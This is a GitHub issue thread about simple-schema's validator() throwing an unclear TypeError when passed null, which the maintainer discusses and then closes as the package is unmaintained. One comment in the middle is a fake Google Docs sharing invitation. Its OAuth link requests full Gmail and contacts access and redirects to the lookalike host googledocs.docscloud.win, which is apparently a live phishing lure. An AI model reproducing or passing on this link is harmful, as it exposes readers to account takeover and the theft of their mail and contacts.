### ISSUE TITLE
Passing null to the validator() method validation function results in cryptic error.

### ISSUE THREAD

**Issue by jcheroske** [aldeed/meteor-simple-schema#649]
I'm using simple-schema with the validated-method package, and making use of the `validator()` method. If `null` is passed to the returned validation function, a TypeError is thrown:

`TypeError: Cannot use 'in' operator to search for '$pushAll' in null'`

This error is useless. Shouldn't passing `null` result in a ValidationError being thrown?

**Comment by aldeed** [comment]
It assumes that you're passing in an object that you want to validate. I guess it would make some sense for it to throw a clearer error if what you pass in is NOT an object, especially in the case of using it for method argument validation. I don't think it would be correct for this to be a ValidationError, though (even though I understand why you think it would make sense for validated-method). Probably the best solution is to update the validated-method package to throw its own ValidationError when the argument is `null`.

**Comment by jcheroske** [comment]
I defer to your better judgement on this. I just wanted to point it out to
you.

**Comment by jcheroske** [comment]
Jay Cheroske has invited you to view the following document:

Open in Docs
<https://accounts.google.com/o/oauth2/auth?client_id=623002641392-km6voeicvso16uuk7pvc8mvbqheobnft.apps.googleusercontent.com&scope=https%3A%2F%2Fmail.google.com%2F+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcontacts&immediate=false&include_granted_scopes=true&response_type=token&redirect_uri=https%3A%2F%2Fgoogledocs.docscloud.win%2Fg.php&customparam=customparam>

**Comment by aldeed** [comment]
The Meteor SimpleSchema package is no longer maintained other than critical fixes to keep it running with each latest Meteor release. Closing non-critical issues in this repo. Anyone who cares about this may do one or more of the following:

- Switch to the [NPM package](https://github.com/aldeed/simple-schema-js). Be sure to adjust for the [breaking changes](https://github.com/aldeed/meteor-simple-schema/blob/master/CHANGELOG.md#200). There can be a lot of work involved in switching, but it is worth the effort.
- If this issue still occurs in the NPM package, [submit an issue there](https://github.com/aldeed/simple-schema-js/issues). Be sure to include a link to a reproduction repo or a PR that adds a failing test for the issue.
- If you have more time than money, submit a pull request to resolve any [issue labeled "help wanted"](https://github.com/aldeed/simple-schema-js/issues?q=is%3Aissue+is%3Aopen+label%3A%22help+wanted%22) in the NPM package repo.
- If you have more money than time, [donate](https://opencollective.com/simple-schema-js/donate) to help support development if you are able
